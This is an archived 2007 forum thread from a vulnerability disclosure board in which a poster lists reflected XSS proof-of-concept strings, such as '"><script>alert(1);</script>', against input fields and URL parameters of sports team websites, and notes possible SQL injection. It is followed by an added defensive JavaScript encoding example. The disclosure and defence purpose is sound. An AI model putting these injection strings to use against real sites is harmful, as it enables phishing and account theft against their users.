ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 12:05AM

Like millions of people, I love sports and I regularly go to my favorite team sites to catch up on the latest news. I also sign up for newsletters notifying me of the latest events. Thinking about this though brings up the definite possibility of targeted phishing attacks using these types of sites. So I decided I would check and see which sites had obvious XSS issues.

("><script>alert('xss');</script> in "Chiefs Pulse" field)
<script>alert('xss');</script>
("><script>alert('xss');</script> in Item Description or Product #) Funny thing is they filter the search box...!REEB&csurl="><script>alert('xss');</script>
("><script>alert('xss');</script in email field)
('><script>alert('xss');</script> in search field)
<script>alert('xss');</script>
("><script>alert('xss');</script> in search field)
("><script>alert('xss');</script> in item description field) Note: appears to be SQL injectable as well.
"><script>alert(1);</script>&month=
("><script>alert('xss');</script> in Item Description field)
("><script>alert('xss');</script> in Item Description field)
("><script>alert(1);</script> in search field)
(<script>alert(1);</script> in search field)
$2Fteam%2Farticle.jsp%3Fid%3D&title="><script>alert(1);</script>
"><script>alert(1);</script>&searchkeyword=test
("><script>alert(1);</script> in Item Description field)
"><script>alert(1);</script>
</title><script>alert(1);</script>

Edited 3 time(s). Last edit at 03/02/2007 12:27AM by Mephisto.

Re: Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 10:58PM

"><script>alert(1);</script>&position=0&splitType=9&splitScope=GAME&qualified=N&yearsExp=-1&splitDD=""><script>alert(1);</script> <-- it throws numerous alerts

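An added defensive illustration, not part of the original posts: the strings reported in this thread break out of a double-quoted attribute, a single-quoted attribute and a `<title>` element, and one site filtered its search box while leaving other fields open. The sketch below applies a single entity encoder to every reflected field; `escapeHtml`, `renderSearchPage` and the page template are assumed names, not code from any of the sites mentioned.

```javascript
// Added example (not from the thread): encode reflected input at output time.
// escapeHtml, renderSearchPage and the template are hypothetical names.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can end an attribute value or start a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Reflects one user-supplied term into the contexts seen in the thread:
// <title> text, a double-quoted attribute, a single-quoted attribute, body text.
function renderSearchPage(term, encode = escapeHtml) {
  const t = encode(term);
  return [
    `<title>Search: ${t}</title>`,
    `<input name="q" value="${t}">`,
    `<input name='item' value='${t}'>`,
    `<p>Results for ${t}</p>`,
  ].join('\n');
}

// True if the rendered page contains an unencoded <script> tag.
function hasLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed sample inputs: the string shapes quoted in the posts.
const SAMPLE_INPUTS = [
  `"><script>alert('xss');</script>`,
  `'><script>alert('xss');</script>`,
  `</title><script>alert(1);</script>`,
  `<script>alert(1);</script>`,
];

// Per input: does a script tag survive without encoding, and with it?
function compareRendering() {
  return SAMPLE_INPUTS.map((input) => ({
    input,
    rawHasScript: hasLiveScript(renderSearchPage(input, (x) => x)),
    encodedHasScript: hasLiveScript(renderSearchPage(input)),
  }));
}

console.log(compareRendering());
```

Entity encoding covers HTML text and quoted attribute values only; input reflected into URLs or inline script needs an encoder for that context.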